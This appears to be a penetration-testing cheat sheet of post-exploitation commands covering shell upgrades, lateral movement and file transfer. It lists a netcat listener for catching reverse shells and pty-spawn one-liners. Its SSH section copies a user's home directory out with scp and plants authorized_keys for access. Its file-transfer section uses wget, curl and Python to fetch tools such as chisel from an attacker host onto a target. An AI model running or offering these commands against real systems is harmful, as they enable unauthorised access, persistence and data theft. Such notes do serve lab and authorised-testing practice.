Upgrade Shell

# RLWRAP allows you to interface local and remote keyboards.
# It gives access to keyboard arrows and history:
rlwrap nc -lvnp port

# Another way to get a better shell.
# 'script' is almost every time present on a Linux machine.
# It takes everything a shell session gets as input and prints it as output, and uses pty to do so: 
SHELL=/bin/bash script -q /dev/null
# Or:
script -qc /bin/bash /dev/null

# Or use Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Optional steps to get a more comfy terminal:
Ctrl-Z
stty raw - echo
fg
reset
xterm
export TERM=xterm
# Alt:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games"

File Upload & Lateral Movement

SSH

# Prevent common error for StrictHostKeyChecking:
ssh -o StrictHostKeyChecking=no [email protected]

# Get all the files FROM 'bob' home dir, recursively:
scp -i id_rsa -rp /home/bob/ [email protected]:/home/bob

# Send keys TO 'bob':
scp -i id_rsa /home/bob/authorized_keys [email protected]:/home/bob/.ssh

# SSH port forward:
ssh> -L 5901:127.0.0.1:5901
kali@kali:~$ sudo ssh -L 80:192.168.xxx.xxx:80 [email protected]

Web Server

Updog (https://github.com/sc0tfree/updog):

pip3 install updog
updog 
updog -d /another/directory
updog -p 1234
updog --password examplePassword123!
updog --ssl

Python web server:

# Python 3:
python3 -m http.server 80

# Python 2:
python2 -m SimpleHTTPServer 8080

File transfer

wget <LHOST>/<file>
curl http://<LHOST>/<file> -o <output-file>
echo "GET /<file> HTTP/1.0" | nc -n <LHOST> 80 > <out-file> && sed -i '1,7d' <out-file>

Using Python:

python -c "from urllib import urlretrieve; urlretrieve('<http://192.168.xx.xxxx/chisel>', '/opt/chisel')"

Secure File transfers:

# On target:  
ncat -nvlp <port> --ssl > <out-file>

# On Kali:  
ncat -nv <RHOST> <RPORT> --ssl < <file-to-send>

Enumeration Tools

Manual Checks